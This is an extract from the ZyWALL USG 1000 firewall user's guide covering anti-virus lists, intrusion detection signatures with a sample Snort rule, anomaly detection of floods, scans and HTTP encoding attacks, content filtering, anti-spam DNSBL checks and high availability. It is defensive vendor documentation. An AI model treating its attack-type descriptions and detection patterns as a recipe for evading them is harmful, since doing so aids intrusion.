Page 562: ... LABEL DESCRIPTION Enable Black List Select this check box to log and delete files with names that match the black list patterns Use the black list to log and delete files with names that match the black list patterns Add Click this to create a new entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry selec...

Page 563: ...n for viruses Use up to 80 characters Alphanumeric characters underscores _ dashes question marks and asterisks are allowed A question mark lets a single character in the file name vary For example use a zip without the quotation marks to specify aa zip ab zip and so on Wildcards let multiple files match the pattern For example use a zip without the quotation marks to specify any file that ends wi...

Page 564: ...virus check on files with names that match the white list patterns Use the white list to have the ZyWALL not perform the anti virus check on files with names that match the white list patterns Add Click this to create a new entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate I...

Page 565: ...making Internet Explorer run slowly and the computer maybe becoming unresponsive just click No to continue Click a column s heading cell to sort the table entries by that column s criteria Click the heading cell again to reverse the sort order Figure 396 Configuration Anti X Anti Virus Signature Search by Severity ...

Page 566: ...ZyWALL search the signatures based on your specified criteria Query all signatures and export Click Export to have the ZyWALL save all of the anti virus signatures to your computer in a txt file Query Result This is the entry s index number in the list Name This is the name of the anti virus signature Click the Name column heading to sort your search results in ascending or descending order accord...

Page 567: ... TYPE DESCRIPTION File Infector This is a small program that embeds itself in a legitimate program A file infector is able to copy and attach itself to other programs that are executed on an infected computer Boot Sector Virus This type of virus infects the area of a hard drive that a computer reads and executes during startup The virus causes computer crashes and to some extend renders the infect...

Page 568: ...o share the resources such as CPU time on the computer for file inspection You have to update the virus signatures and or perform virus scans on all computers in the network regularly A network based anti virus NAV scanner is often deployed as a dedicated security device such as your ZyWALL on the network edge NAV scanners inspect real time data traffic such as E mail messages or web that tends to...

Page 569: ...age 573 to add a new profile edit an existing profile or delete an existing profile Use the Anti X IDP Custom Signature screens Section 34 8 on page 588 to create a new signature edit an existing signature delete existing signatures or save signatures to your computer 34 1 2 What You Need To Know Packet Inspection Signatures A signature identifies a malicious or suspicious packet and specifies an ...

Page 570: ...uration Changes to the ZyWALL s IDP settings affect new sessions not the sessions that already existed before you applied the changed settings Finding Out More See Section 6 5 20 on page 110 for IDP prerequisite information See Chapter 35 on page 605 for anomaly detection and protection See Section 34 9 on page 600 for more information on network based intrusions See Section 34 6 2 on page 580 for...

Page 571: ...ure 397 Configuration Anti X IDP General The following table describes the screens in this screen Table 152 Configuration Anti X IDP General LABEL DESCRIPTION General Settings Enable Signature Detection You must register for IDP service in order to use packet inspection signatures If you don t have a standard license you can register for a once off trial one Policies Use this list to specify which...

Page 572: ...s LAN zone interfaces The ZyWALL does not check packets traveling from a LAN computer to another LAN computer on the same subnet From WAN To WAN means packets that come in from the WAN zone and the ZyWALL routes back out through the WAN zone IDP Profile This field shows which IDP profile is bound to which traffic direction Select an IDP profile to apply to the entry s traffic direction Configure t...

Page 573: ...n anomaly detection Current Version This field displays the IDP signature set version number This number gets larger as the set is enhanced Signature Number This field displays the number of IDP signatures in this set This number usually gets larger as the set is enhanced Older signatures and rules may be removed if they are no longer applicable or have been supplanted by newer ones Released Date ...

Page 574: ...not log alerts and no action is taken on packets that trigger them wan Signatures for all services are enabled Signatures with a medium high or severe severity level greater than two generate logs not log alerts and no action is taken on packets that trigger them Signatures with a very low or low severity level less than or equal to two are disabled lan This profile is most suitable for common LAN...

Page 575: ... SMTP SNMP SQL TELNET Oracle MySQL are enabled Signatures with a high or severe severity level greater than three generate log alerts and cause packets that trigger them to be dropped Signatures with a low or medium severity level two or three generate logs not log alerts and no action is taken on packets that trigger them Signatures with a very low severity level one are disabled OK Click OK to s...

Page 576: ...the false alarms When you re satisfied that they have been reduced to an acceptable level you could then create an inline profile whereby you configure appropriate actions to be taken when a packet matches a signature 34 5 1 Procedure To Create a New Profile To create a new profile 1 Click the Add icon in the Configuration Anti X IDP Profile screen to display a pop up screen allowing you to choose...

Page 577: ...figuration Anti X IDP Profile and then add a new or edit an existing profile select Packet inspection signatures examine the contents of a packet for malicious data It operates at layer 4 to layer 7 34 6 1 Profile Group View Screen Figure 400 Configuration Anti X IDP Profile Edit Group View ...

Page 578: ... by criteria such as name ID severity attack type vulnerable attack platforms service category log options or actions Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Log To edit an item s log option select it and use the Log icon These are the log options no Select this option on an individual signature or a complete service ...

Page 579: ... the ZyWALL send a reset to both the sender and receiver when a packet matches the signature If it is a TCP attack packet the ZyWALL will send a packet with a RST flag to the receiver and sender If it is an ICMP or UDP attack packet the ZyWALL will send an ICMP unreachable packet This is the entry s index number in the list Status The activate light bulb icon is lit when the entry is active and di...

Page 580: ...in the final profile screen to complete the profile Table 155 Configuration Anti X IDP Profile Group View continued LABEL DESCRIPTION Table 156 Policy Types POLICY TYPE DESCRIPTION P2P Peer to peer P2P is where computing devices link directly to each other and can directly initiate communication with each other they do not need an intermediary A device can be both the client and the server In the ...

Page 581: ...he overflow buffer region to obtain control of the system install a backdoor or use the victim to launch attacks on other devices Virus Worm A computer virus is a small program designed to corrupt and or alter the operation of other legitimate programs A worm is a program that is designed to copy itself from one computer to another on a network A worm s uncontrolled replication consumes system res...

Page 582: ...n that group If you select original setting for service group logs and or actions all signatures within that group are returned to their last saved settings Figure 401 Configuration Anti X IDP Profile Edit IDP Service Group 34 6 4 Profile Query View Screen Click Switch to query view in the screen as shown in Figure 400 on page 577 to go to a signature query screen In the query view screen you can ...

Page 583: ...oup View screen Switch to group view Click this button to go to the IDP profile group view screen where IDP signatures are grouped by service and you can configure activation logs and or actions Query Signatures Select the criteria on which to perform the search Search all custom signatures Select this check box to search for signatures you created or imported in the Custom Signatures screen You c...

Page 584: ...trl key if you want to make multiple selections Action Search for signatures by the response the ZyWALL takes when a packet matches a signature See Table 155 on page 578 for action details Hold down the Ctrl key if you want to make multiple selections Activation Search for activated and or inactivated signatures here Log Search for signatures by log option here See Table 155 on page 578 for option...

Page 585: ...34 IDP ZyWALL USG 1000 User s Guide 585 34 6 5 Query Example This example shows a search with these criteria Severity severe and high Attack Type DDoS Platform Windows 2000 and Windows XP computers Service Any ...

Page 586: ...Chapter 34 IDP ZyWALL USG 1000 User s Guide 586 Actions Any Figure 403 Query Example Search Criteria Figure 404 Query Example Search Results ...

Page 587: ...cates IP version 4 IHL IP Header Length is the number of 32 bit words forming the total length of the header usually five Type of Service The Type of Service also known as Differentiated Services Code Point DSCP is usually set to 0 but may indicate particular quality of service needs from the network Total Length This is the size of the datagram in bytes It is the combined length of the header and...

Page 588: ... router or bridge where the packet is not protected by a link layer cyclic redundancy check Packets with an invalid checksum are discarded by all nodes in an IP network Source IP Address This is the IP address of the original sender of the packet Destination IP Address This is the IP address of the final destination of the packet Options IP options is a variable length list of IP options for a dat...

Page 589: ...n entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Export To save an entry or entries as a file on your computer select them and click Export Click Save in the file download dialog box and then select a location and name for the file Custom signatures must end with the rules file name extension...

Page 590: ...mport custom signatures previously saved to your computer to the ZyWALL Note The name of the complete custom signature file on the ZyWALL is custom rules If you import a file named custom rules then all custom signatures on the ZyWALL are overwritten with the new file If this is not your intention make sure that the files you import are not named custom rules File Path Type the file path and name ...

Page 591: ...0 User s Guide 591 Try to write signatures that target a vulnerability for example a certain type of traffic on certain operating systems instead of a specific exploit Figure 407 Configuration Anti X IDP Custom Signatures Add Edit ...

Page 592: ... that is the operating systems you want to protect from this intrusion SGI refers to Silicon Graphics Incorporated who manufactures multi user Unix workstations that run the IRIX operating system SGI s version of UNIX A router is an example of a network device Service Select the IDP service group that the intrusion exploits or targets See Table 157 on page 581 for a list of IDP service groups The ...

Page 593: ...ual Smaller or Greater and then type in a number IP Options IP options is a variable length list of IP options for a datagram that define IP Security Option IP Stream Identifier security and handling restrictions for the military Record Route have each router record its IP address Loose Source Routing specifies a list of IP addresses that must be traversed by the datagram Strict Source Routing spe...

Page 594: ...ence Number Use this field to check for a specific TCP sequence number Ack Number Use this field to check for a specific TCP acknowledgement number Window Size Use this field to check for a specific TCP window size Transport Protocol UDP Port Select the check box and then enter the source and destination UDP port numbers that will trigger this signature Transport Protocol ICMP Type Use this field ...

Page 595: ...er Decode as URI A Uniform Resource Identifier URI is a string of characters for identifying an abstract or physical resource RFC 2396 A resource can be anything that has identity for example an electronic document an image a service today s weather report for Taiwan a collection of other resources An identifier is an object that can act as a reference to something that has identity Example URIs a...

Page 596: ...mation about the attack as you can The more specific your signature the less chance it will cause false positives As an example say you want to check if your router is being overloaded with DNS queries so you create a signature to detect DNS query traffic OK Click this button to save your changes to the ZyWALL and return to the summary screen Cancel Click this button to return to the summary scree...

Page 597: ...yzer also known as a network or protocol analyzer such as Wireshark or Ethereal to investigate some more Figure 408 DNS Query Packet Details From the details about DNS query you see that the protocol is UDP and the port is 53 The type of DNS packet is standard query and the Flag is 0x0100 with an offset of 2 Therefore enter 010 as the first pattern ...

Page 598: ...hown in the following figure Figure 409 Example Custom Signature 34 8 3 Applying Custom Signatures After you create your custom signature it becomes available in the IDP service group category in the Configuration Anti X IDP Profile Edit screen Custom signatures have an SID from 9000000 to 9999999 ...

Page 599: ...u may also want to configure an alert if it is for a serious attack and needs immediate attention After you apply the signature to a zone you can see if it works by checking the logs Monitor Log The Priority column shows warn for signatures that are configured to generate a log only It shows critical for signatures that are configured to generate a log and alert All IDP signatures come under the I...

Page 600: ...ver in with the goal of accessing confidential information or destroying information on a computer You must install a host IDP directly on the system being protected It works closely with the operating system monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them Disadvantages of host IDPs are that you have to install them on each device that...

Page 601: ...Snort rules are divided into two logical sections the rule header and the rule options as shown in the following example alert tcp any any 192 168 1 0 24 111 content 00 01 a5 msg mountd access The text up to the first parenthesis is the rule header and the section enclosed in parenthesis contains the rule options The words before the colons in the rule options section are the option keywords The r...

Page 602: ...dow Size window Transport Protocol UDP In Snort rule header Port In Snort rule header Transport Protocol ICMP Type itype Code icode ID icmp_id Sequence Number icmp_seq Payload Options Snort rule options Payload Size dsize Offset relative to start of payload offset Relative to end of last match distance Content content Case insensitive nocase Decode as URI uricontent Table 162 ZyWALL Snort Equivale...

Page 603: ...Chapter 34 IDP ZyWALL USG 1000 User s Guide 603 ...

Page 604: ...Chapter 34 IDP ZyWALL USG 1000 User s Guide 604 ...

Page 605: ...t inspection 2 ADP traffic and anomaly rules are updated when you upload new firmware This is different from the IDP packet inspection signatures and the system protect signatures you download from myZyXEL com 35 1 2 What You Can Do in this Chapter Use Anti X ADP General Section 35 2 on page 607 to turn anomaly detection on or off and apply anomaly profiles to traffic directions Use Anti X ADP Pro...

Page 606: ...apply ADP profiles to traffic flowing from one zone to another Base ADP Profiles Base ADP profiles are templates that you use to create new ADP profiles The ZyWALL comes with several base profiles See Table 164 on page 609 for details on ADP base profiles ADP Policy An ADP policy refers to application of an ADP profile to a traffic flow Finding Out More See Section 6 5 21 on page 110 for ADP prere...

Page 607: ...lowing in a specific direction Edit the policies directly in the table Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and ...

Page 608: ...LAN means packets traveling from a computer on one LAN subnet to a computer on another LAN subnet via the ZyWALL s LAN zone interfaces The ZyWALL does not check packets traveling from a LAN computer to another LAN computer on the same subnet From WAN To WAN means packets that come in from the WAN zone and the ZyWALL routes back out through the WAN zone Note Depending on your network topology and t...

Page 609: ...ion Anti X ADP Profile Table 164 Base Profiles BASE PROFILE DESCRIPTION none All traffic anomaly and protocol anomaly rules are disabled No logs are generated nor actions are taken all All traffic anomaly and protocol anomaly rules are enabled Rules with a high or severe severity level greater than three generate log alerts and cause packets that trigger them to be dropped Rules with a very low lo...

Page 610: ... could then create an inline profile whereby you configure appropriate actions to be taken when a packet matches a rule ADP profiles consist of traffic anomaly profiles and protocol anomaly profiles To create a new profile select a base profile see Table 164 on page 609 and then click OK to go to the profile details screen Type a new profile name enable or disable individual rules and then edit th...

Page 611: ...pter 35 ADP ZyWALL USG 1000 User s Guide 611 belonging to this profile make sure you have clicked OK or Save to save the changes before selecting the Traffic Anomaly tab Figure 415 Profiles Traffic Anomaly ...

Page 612: ...olds and sample times are set high so most traffic anomaly attacks will be detected however you will have more logs and false positives Block Period Specify for how many seconds the ZyWALL blocks all packets from being sent to the victim destination of a detected anomaly attack Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate ...

Page 613: ...tab Name This is the name of the traffic anomaly rule Click the Name column heading to sort in ascending or descending order according to the rule name Log These are the log options To edit this select an item and use the Log icon Action This is the action the ZyWALL should take when a packet matches a rule To edit this select an item and use the Action icon Threshold For flood detection you can s...

Page 614: ...Chapter 35 ADP ZyWALL USG 1000 User s Guide 614 Figure 416 Profiles Protocol Anomaly ...

Page 615: ...id unique profile names MyProfile mYProfile Mymy12_3 4 These are invalid profile names 1mYProfile My Profile MyProfile Whatalongprofilename123456789012 HTTP Inspection TCP Decoder UDP Decoder ICMP Decoder Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Log To edit an item s log option select it and use the Log icon Select whe...

Page 616: ...t both Select this action on an individual signature or a complete service group to have the ZyWALL send a reset to both the sender and receiver when a packet matches the rule If it is a TCP attack packet the ZyWALL will send a packet with a RST flag to the receiver and sender If it is an ICMP or UDP attack packet the ZyWALL will send an ICMP unreachable packet This is the entry s index number in ...

Page 617: ... Portscan IP Portscan An IP port scan searches not only for TCP UDP and ICMP protocols in use by the remote computer but also additional IP protocols such as EGP Exterior Gateway Protocol or IGP Interior Gateway Protocol Determining these additional protocols can help reveal if the destination device is a workstation a printer or a router OK Click OK to save your settings to the ZyWALL complete th...

Page 618: ... that is they are one to many port scans One host scans a single port on multiple hosts This may occur when a new exploit comes out and the attacker is looking for a specific service These are some port sweep types TCP Portsweep UDP Portsweep IP Portsweep ICMP Portsweep Filtered Port Scans A filtered port scan may indicate that there were no network errors ICMP unreachables or TCP RSTs or response...

Page 619: ... address of the network The router will broadcast the ICMP echo request packet to all hosts on the network If there are numerous hosts this will create a large amount of ICMP echo request and response traffic If an attacker A spoofs the source IP address of the ICMP echo request packet the resulting ICMP traffic will not only saturate the receiving network B but the network of the spoofed source I...

Page 620: ...all outstanding SYN ACK responses on a backlog queue SYN ACKs are only moved off the queue when an ACK comes back or when an internal timer ends the three way handshake Once the queue is full the system will ignore all incoming SYN requests making the system unavailable for other users Figure 419 SYN Flood LAND Attack In a LAND attack hackers flood SYN packets into a network with a spoofed source ...

Page 621: ...r a space delimiter Apache uses this so if you have an Apache server you need to enable this option ASCII ENCODING ATTACK This rule can detect attacks where malicious attackers use ASCII encoding to encode attack strings Attackers may use this method to bypass system parameter checks in order to get information or privileges from a web server BARE BYTE UNICODING ENCODING ATTACK Bare byte encoding ...

Page 622: ...ted by both Apache and IIS web servers OVERSIZE CHUNK ENCODING ATTACK This rule is an anomaly detector for abnormally large chunk sizes This picks up the apache chunk encoding exploits and may also be triggered on HTTP tunneling that uses chunk encoding OVERSIZE REQUEST URI DIRECTORY ATTACK This rule takes a non zero positive integer as an argument The argument specifies the max character director...

Page 623: ...ean the packet was truncated TTCP DETECTED ATTACK T TCP provides a way of bypassing the standard three way handshake found in TCP thus speeding up transactions However this could lead to unauthorized access to the system by spoofing connections UNDERSIZE LEN ATTACK This is when a TCP packet is sent which has a TCP datagram length of less than 20 bytes This may cause some applications to crash UNDE...

Page 624: ...less than the ICMP header length This may cause some applications to crash TRUNCATED TIMESTAMP HEADER ATTACK This is when an ICMP packet is sent which has an ICMP datagram length of less than the ICMP Time Stamp header length This may cause some applications to crash Table 168 HTTP Inspection and TCP UDP ICMP Decoders continued LABEL DESCRIPTION ...

Page 625: ...Chapter 35 ADP ZyWALL USG 1000 User s Guide 625 ...

Page 626: ...Chapter 35 ADP ZyWALL USG 1000 User s Guide 626 ...

Page 627: ...n web features such as cookies and or block access to specific web sites It can also block access to specific categories of web site content You can create different content filter policies for different addresses schedules users or groups and content filter profiles For example you can configure one policy that blocks John Doe s access to arts and entertainment web pages during the workday and an...

Page 628: ...bers When a matching policy is found the content filter allows or blocks the request depending on the settings of the filtering profile specified by the policy Some requests may not match any policy The ZyWALL allows the request if the default policy is not set to block The ZyWALL blocks the request if the default policy is set to block External Web Filtering Service When you register for and enab...

Page 629: ...ding Out More See Section 6 5 22 on page 110 for related information on these screens See Section 36 7 on page 649 for content filtering background technical information 36 1 3 Before You Begin You must configure an address object a schedule object and a filtering profile before you can set up a content filter policy You must subscribe to use the external database content filtering see the Licensi...

Page 630: ...t Filter Report Service Select this check box to have the ZyWALL collect category based content filtering statistics Policies This is a list of the configured content filter policies Block web access when no policy is applied Select this check box to stop users from accessing the Internet by default when their attempted access does not match a content filter policy Add Click this to create a new e...

Page 631: ...tent filter policy You can define different policies for different time periods none means the content filter policy applies all of the time User This column displays the individual or group to which this policy applies any means the content filter policy applies to all of the web access requests that the ZyWALL receives from any user Filter Profile This column displays the name of the content fil...

Page 632: ...er is not active You can view content filter reports after you register the ZyWALL and activate the subscription service in the Registration screen see Chapter 37 on page 651 License Type This read only field displays what kind of service registration you have for the content filtering database None displays if you have not successfully registered and activated the service Standard displays if you...

Page 633: ...s access to certain categories after the work day is over Select none to have the content filter policy apply all of the time Address Select the address or address group for which you want to use this policy Select any to have the content filter policy apply to all of the web access requests that the ZyWALL receives from any IP address Filter Profile Use the drop down list box to select the conten...

Page 634: ... X Content Filter Filter Profile Add or Edit to open the Categories screen Use this screen to enable external database content filtering and select which web site categories to block and or log Note You must register for external content filtering before you can use it See Section 11 2 on page 267 for how to register Table 171 Configuration Anti X Content Filter Filter Profile LABEL DESCRIPTION Ad...

Page 635: ...Chapter 36 Content Filtering ZyWALL USG 1000 User s Guide 635 See Chapter 37 on page 651 for how to view content filtering reports Figure 423 Configuration Anti X Content Filter Filter Profile Add ...

Page 636: ... after you register the ZyWALL and activate the subscription service in the Registration screen see Chapter 37 on page 651 License Type This read only field displays what kind of service registration you have for the content filtering database None displays if you have not successfully registered and activated the service Standard displays if you have successfully registered the ZyWALL and activat...

Page 637: ...at match the other categories that you select below When external database content filtering blocks access to a web page it displays the denied access message that you configured in the Content Filter General screen along with the category of the blocked web page Select Log to record attempts to access web pages that match the other categories that you select below Action for Unrated Web Pages Sel...

Page 638: ...ntent filtering s license key is invalid Select Log to record attempts to access web pages that occur when the external content filtering database is unavailable Content Filter Category Service Timeout Specify a number of seconds 1 to 60 for the ZyWALL to wait for a response from the external content filtering server If there is still no response by the time this period expires the ZyWALL blocks o...

Page 639: ...onnect and send user info sites that make extensive use of tracking cookies without a posted privacy statement and sites to which browser hijackers redirect users Usually does not include sites that can be marked as Spyware Malware Note Sites rated as spyware effects typically have a second category assigned with them Managed Categories These are categories of web pages based on their content Sele...

Page 640: ...s not include pages that sell gambling related products or machines It also does not include pages for offline casinos and hotels as long as those pages do not meet one of the above requirements Violence Hate Racism This category includes pages that depict extreme physical harm to people or property or that advocate or provide instructions on how to cause such harm It also includes pages that advo...

Page 641: ...hat offer educational information distance learning and trade school information or programs It also includes pages that are sponsored by schools educational facilities faculty or alumni groups Cultural Charitable Organization This category includes pages that nurture cultural understanding and foster volunteerism such as 4H the Lions and Rotary Clubs Also encompasses non profit associations that ...

Page 642: ...at provide assistance in finding employment and tools for locating prospective employers News Media This category includes pages that primarily report information or comments on current events or contemporary issues of the day It also includes radio stations and magazines It does not include pages that can be rated in other categories Personals Dating This category includes pages that promote inte...

Page 643: ...ntially act as your personal hard drive on the Internet Remote Access Tools This category includes pages that primarily focus on providing information about and or methods that enables authorized access to and use of a desktop computer or private network remotely Shopping This category includes pages that provide or advertise the means to obtain goods or services It does not include pages that can...

Page 644: ... and sharing across a network without dependence on a central server Streaming Media MP3s This category includes pages that sell deliver or stream music or video content in any format including sites that provide downloads for such viewers Proxy Avoidance This category includes pages that provide information on how to bypass proxy server appliance features or gain access to URLs in any way that by...

Page 645: ...es sites that are part of the Web and email spam ecosystem Sites that are determined to be clearly malicious or benign will be placed in a different category Alternative Sexuality Lifestyles This category includes pages that provide information promote or cater to alternative sexual expressions in their myriad forms It includes but is not limited to the full range of non traditional sexual practic...

Page 646: ...est You can check which category a web page belongs to Enter a web site URL in the text box Test Against Local Cache Click this button to see the category recorded in the ZyWALL s content filtering database for the web page you specified if the database has an entry for it Test Against Content Filter Category Server Click this button to see the category recorded in the external content filter serv...

Page 647: ...keywords from the filter list Figure 425 Configuration Anti X Content Filter Filter Profile Customization The following table describes the labels in this screen Table 173 Configuration Anti X Content Filter Filter Profile Customization LABEL DESCRIPTION Name Enter a descriptive name for this content filtering profile name You may use 1 31 alphanumeric characters underscores _ or dashes but the fi...

Page 648: ...y pointing to this proxy server Allow Java ActiveX Cookies Web proxy to trusted web sites When this box is selected the ZyWALL will permit Java ActiveX and Cookies from sites on the Trusted Web Sites list to the LAN In certain cases it may be desirable to allow Java ActiveX or Cookies from sites that are known and trusted Trusted Web Sites These are sites that you want to allow access to regardles...

Page 649: ... This section allows you to block Web sites with URLs that contain certain keywords in the domain name or IP address Add Click this to create a new entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Blocked URL Keywords This list displays the keywords already added Enter a keyword or a numerical IP address to block You can also ente...

Page 650: ...onfiguration 3 Use the Content Filter Cache screen to configure how long a web site address remains in the cache as well as view those web site addresses see Section 10 18 on page 255 All of the web site address records are also cleared from the local cache when the ZyWALL restarts 4 If the ZyWALL has no record of the web site it queries the external content filter database and simultaneously send...

Page 651: ... register your device and activate the subscription services 37 2 Viewing Content Filter Reports Content filtering reports are generated statistics and charts of access attempts to web sites belonging to the categories you selected in your device content filter screen You need to register your iCard before you can view content filtering reports Alternatively you can also view content filtering rep...

Page 652: ...Chapter 37 Content Filter Reports ZyWALL USG 1000 User s Guide 652 2 Fill in your myZyXEL com account information and click Login Figure 427 myZyXEL com Login ...

Page 653: ...ys Click your ZyWALL s model name and or MAC address under Registered ZyXEL Products the ZyWALL 70 is shown as an example here You can change the descriptive name for your ZyWALL using the Rename button in the Service Management screen see Figure 429 on page 654 Figure 428 myZyXEL com Welcome ...

Page 654: ... 4 In the Service Management screen click Content Filter in the Service Name column to open the content filter reports screens Figure 429 myZyXEL com Service Management 5 In the Web Filter Home screen click the Reports tab Figure 430 Content Filter Reports Main Screen ...

Page 655: ...orts Figure 431 Content Filter Reports Report Home 7 Select a time period in the Date Range field either Allowed or Blocked in the Action Taken field and a category or enter the user name if you want to view single user reports and click Run Report The screens vary according to the report type you selected in the Report Home screen ...

Page 656: ...Chapter 37 Content Filter Reports ZyWALL USG 1000 User s Guide 656 8 A chart and or list of requested web site categories display in the lower half of the screen Figure 432 Global Report Screen Example ...

Page 657: ...ntent Filter Reports ZyWALL USG 1000 User s Guide 657 9 You can click a category in the Categories report or click URLs in the Report Home screen to see the URLs that were requested Figure 433 Requested URLs Example ...

Page 658: ...Chapter 37 Content Filter Reports ZyWALL USG 1000 User s Guide 658 ...

Page 659: ...0 to have the ZyWALL check e mail against DNS Black Lists 38 1 2 What You Need to Know White list Configure white list entries to identify legitimate e mail The white list entries have the ZyWALL classify any e mail that is from a specified sender or uses a specified header field and header value as being legitimate see E mail Headers on page 660 for more on mail headers The anti spam feature chec...

Page 660: ...use SMTP to send messages to a mail server The older POP2 requires SMTP for sending messages while the newer POP3 can be used with or without it This is why many e mail applications require you to specify both the SMTP server and the POP or IMAP server even though they may actually be the same server The ZyWALL s anti spam feature checks SMTP TCP port 25 and POP3 TCP port 110 e mails The anti spam...

Page 661: ... is also known as a DNS spam blocking list The ZyWALL can check the routing addresses of e mail against DNSBLs and classify an e mail as spam if it was sent or forwarded by a computer with an IP address in the DNSBL Finding Out More See Section 38 7 on page 672 for more background information on anti spam 38 2 Before You Begin Configure your zones before you configure anti spam 38 3 The Anti Spam ...

Page 662: ...e mail session is when an e mail client and e mail server or two e mail servers connect through the ZyWALL Select how to handle concurrent e mail sessions that exceed the maximum number of concurrent e mail sessions that the anti spam feature can handle See the chapter of product specifications for the threshold Select Forward Session to have the ZyWALL allow the excess e mail sessions without any...

Page 663: ...ivate light bulb icon is lit when the entry is active and dimmed when the entry is inactive Priority This is the position of an anti spam policy in the list The ordering of your anti spam policies is important as the ZyWALL applies them in sequence Once traffic matches an anti spam policy the ZyWALL applies that policy and does not check the traffic against any more policies From The anti spam pol...

Page 664: ...elect how the ZyWALL is to log the event when the DNSBL times out or an e mail matches the white list black list or DNSBL no Do not create a log log Create a log on the ZyWALL log alert An alert is an e mailed log for more serious events that may need more immediate attention Select this option to have the ZyWALL send an alert From To Select source and destination zones for traffic to scan for spa...

Page 665: ...k list entry as spam Check DNSBL Select this check box to check e mail against the ZyWALL s configured DNSBL domains The ZyWALL classifies e mail that matches a DNS black list as spam Actions for Spam Mail Use this section to set how the ZyWALL is to handle spam mail SMTP Select how the ZyWALL is to handle spam SMTP mail Select drop to discard spam SMTP mail Select forward to allow spam SMTP mail ...

Page 666: ...mails that match the ZyWALL s spam black list Rule Summary Add Click this to create a new entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Status The activate light bulb icon is lit when the entry is active and ...

Page 667: ...ding list screen enable the anti spam feature in the anti spam general screen and configure an anti spam policy to use the list Type Use this field to base the entry on the e mail s subject source or relay IP address source e mail address or header Select Subject to have the ZyWALL check e mail for specific content in the subject line Select IP Address to have the ZyWALL check e mail for a specifi...

Page 668: ... notation Netmask This field displays when you select the IP type Enter the subnet mask here if applicable Sender E Mail Address This field displays when you select the E Mail type Enter a keyword up to 63 ASCII characters See Section 38 4 2 on page 668 for more details Mail Header Field Name This field displays when you select the Mail Header type Type the name part of an e mail header the part t...

Page 669: ...78 Configuration Anti X Anti Spam Black White List White List LABEL DESCRIPTION General Settings Enable White List Checking Select this check box to have the ZyWALL forward e mail that matches an active white list entry without doing any more anti spam checking on that individual e mail Rule Summary Add Click this to create a new entry See Section 38 4 1 on page 667 for details Edit Select an entr...

Page 670: ...SBLs Figure 439 Configuration Anti X Anti Spam DNSBL Type This field displays whether the entry is based on the e mail s subject source or relay IP address source e mail address or a header Content This field displays the subject content source or relay IP address source e mail address or header value for which the entry checks OK Click OK to save your changes Cancel Click Cancel to exit this scre...

Page 671: ...address in the mail header This is the IP of the sender or the first server that forwarded the mail Select last N IPs to have the ZyWALL start checking from the last IP address in the mail header This is the IP of the last server that forwarded the mail Query Timeout Setting SMTP Select how the ZyWALL is to handle SMTP mail mail going to an e mail server if the queries to the DNSBL domains time ou...

Page 672: ... one non spam reply for each of an e mail s routing IP addresses the ZyWALL immediately classifies the e mail as legitimate and forwards it Any further DNSBL replies that come after the ZyWALL classifies an e mail as spam or legitimate have no effect The ZyWALL records DNSBL responses for IP addresses in a cache for up to 72 hours The ZyWALL checks an e mail s sender and relay IP addresses against...

Page 673: ...ate query to each of its DNSBL domains for IP address b b b b 2 DNSBL A replies that IP address a a a a does not match any entries in its list not spam 3 DNSBL C replies that IP address b b b b matches an entry in its list 4 The ZyWALL immediately classifies the e mail as spam and takes the action for spam that you defined in the anti spam policy In this example it was an SMTP mail and the defined...

Page 674: ...her separate query to each of its DNSBL domains for IP address d d d d 2 DNSBL B replies that IP address d d d d does not match any entries in its list not spam 3 DNSBL C replies that IP address c c c c does not match any entries in its list not spam 4 Now that the ZyWALL has received at least one non spam reply for each of the e mail s routing IP addresses the ZyWALL immediately classifies the e ...

Page 675: ...rate query to each of its DNSBL domains for IP address w x y z 2 DNSBL A replies that IP address a b c d does not match any entries in its list not spam 3 While waiting for a DNSBL reply about IP address w x y z the ZyWALL receives a reply from DNSBL B saying IP address a b c d is in its list 4 The ZyWALL immediately classifies the e mail as spam and takes the action for spam that you defined in t...

Page 676: ...Chapter 38 Anti Spam ZyWALL USG 1000 User s Guide 676 ...

Page 677: ...Active Passive Mode screens Section 39 3 on page 680 to use active passive mode device HA You can configure general active passive mode device HA settings view and manage the list of monitored interfaces and synchronize backup ZyWALLs Use the Legacy Mode screens Section 39 5 on page 687 to use legacy mode device HA You can configure general legacy mode HA settings including link monitoring configu...

Page 678: ... virus IDP application patrol and system protect and certificates Note Only ZyWALLs of the same model and firmware version can synchronize Otherwise you must manually configure the master ZyWALL s settings on the backup by editing copies of the configuration files in a text editor for example Finding Out More See Section 6 5 24 on page 111 for related information on these screens See Section 39 7 ...

Page 679: ...ip between the master and backup ZyWALLs such as active active or using different ZyWALLs as the master for individual interfaces The master and its backups must all use the same device HA mode Click the link to go to the screen where you can configure the ZyWALL to use the device HA mode that it is not currently using Monitored Interface Summary This table shows the status of the interfaces that ...

Page 680: ...monitored interface s status in the virtual router Active This interface is up and using the virtual IP address and subnet mask Stand By This interface is a backup interface in the virtual router It is not using the virtual IP address and subnet mask Fault This interface is not functioning in the virtual router right now In active passive mode or in legacy mode with link monitoring enabled if one ...

Page 681: ...nd backup ZyWALLs Each monitored interface must have a static IP address and be connected to the same subnet as the corresponding interface on the backup or master ZyWALL Virtual Router and Management IP Addresses If a backup takes over for the master it uses the master s IP addresses These IP addresses are know as the virtual router IP addresses Each interface can also have a management IP addres...

Page 682: ...ses 39 3 1 Configuring Active Passive Mode Device HA The Device HA Active Passive Mode screen lets you configure general active passive mode device HA settings view and manage the list of monitored interfaces and synchronize backup ZyWALLs To access this screen click Configuration Device HA Active Passive Mode Figure 448 Configuration Device HA Active Passive Mode A 192 168 1 1 B 192 168 1 1 192 1...

